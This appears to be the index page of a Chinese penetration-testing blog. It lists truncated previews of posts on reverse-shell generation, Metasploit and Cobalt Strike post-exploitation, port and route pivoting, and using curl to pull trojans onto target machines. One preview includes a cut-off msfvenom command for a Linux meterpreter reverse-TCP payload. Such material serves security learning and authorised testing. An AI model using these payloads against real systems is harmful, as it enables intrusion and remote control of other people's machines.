天道酬勤

黑客工具

Esp8266模块再烧录之擦除-HackerGu‘s Blog

Esp8266模块再烧录之擦除

Gu阅读(336)评论(0)赞(0)

之前烧录过一次,所以重新烧录的时候,需要将之前烧录的内容擦除掉。 擦除的办法是通过Python2下的模块esptool。 安装方法 pip2 install esptool 擦除方法 首先在设备管理器中,查看是哪一个串口,我这里是COM7。...

Print-My-Shell-反向Shell生成工具-HackerGu‘s Blog

Print-My-Shell-反向Shell生成工具

Gu阅读(670)评论(0)赞(2)

Print-My-Shell “Print-My-Shell”是一个由Python编写的用于生成各类反向shell的脚本。 使用此脚本,我们可以轻松生成各种类型的反向Shell,而无需离开命令行。在做Vulnhub和...

Kalindeep1.0-HackerGu‘s Blog

Kalindeep1.0

Gu阅读(580)评论(0)赞(2)

好久没更新了,最近瞎忙。 更新一个自己写的工具 附上链接:https://github.com/jianxiaohong/shell/blob/master/kalindeep.sh deepin搭建渗透环境不是特别顺畅,系统源是一个很大的...

Kali2020.1修改终端root用户颜色-HackerGu‘s Blog

Kali2020.1修改终端root用户颜色

Gu阅读(4500)评论(0)赞(24)

昨晚更新了kali2020.1,感觉很不舒服,尤其是这个root终端的颜色,还是习惯了root用户为初始用户,强迫症。 上面这幅图便是kali用户和root用户的区别,看着真难受。 echo $PS1,这便是区别所在。 那我们怎么让root...

Centos下安装msf-HackerGu‘s Blog

Centos下安装msf

Gu阅读(1845)评论(0)赞(3)

经常性更换服务器,所以导致某些工具,安来安去,不能每一次都重新查找安装教程,我还是得自己总结一下。 我的服务器呢是Centos7. 安装msf 官方提供的一键化安装脚本: curl https://raw.githubusercontent...

Msf和CS上线不出网的机器-HackerGu‘s Blog

Msf和CS上线不出网的机器

Gu阅读(1297)评论(0)赞(0)

内网中的很多机器是不可以出网的,那该如何在Msf和CS中上线呢? MSF 我们的目标机器是一台linux服务器,我们先生成elf马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1...

Curl在渗透测试中的应用(LOLBAS)-HackerGu‘s Blog

Curl在渗透测试中的应用(LOLBAS)

Gu阅读(838)评论(2)赞(2)

Curl介绍 curl是一个利用URL语法在命令行下工作的文件传输工具,1997年首次发行。它支持文件上传和下载,所以是综合传输工具。 curl可以用于处理远程服务器上的文件。 例如,我们可以在目标机器上利用curl下载远程服务器的木马文件...

Metasploit—端口转发-HackerGu‘s Blog

Metasploit—端口转发

Gu阅读(546)评论(0)赞(1)

拿下目标服务器,开始对内网进行探测。 此时,服务器是公网IP,但是我们想要访问内网中 192.168.234.160 的3389端口,登上远程桌面。由于在内网,我们无法直接连接,所以我们需要端口转发,将192.168.234.160机器的3...

Metasploit—路由转发与主机发现-HackerGu‘s Blog

Metasploit—路由转发与主机发现

Gu阅读(514)评论(0)赞(0)

路由转发 在我们成功拿到meterpreter的shell之后,想要探测内网的信息,这时候我们就要用到路由转发了。 大致的意思就是,利用msf添加一条通向内网的路由,我们利用这条添加的路由,去扫描内网的信息,发现存活的主机。如果不加路由的话...

几种常见的cobaltstrike上线方式-HackerGu‘s Blog

几种常见的cobaltstrike上线方式

Gu阅读(2369)评论(0)赞(0)

总结一下几个常用的cs上线方式。 Windows EXE 点击Generate,会生成一个exe文件,令目标机器运行此exe文件,即可上线。 Windows Service EXE 虽然这也是一个exe文件,但是它需要通过服务来上线。我们先...

专注黑客技术的研究

联系我们联系我们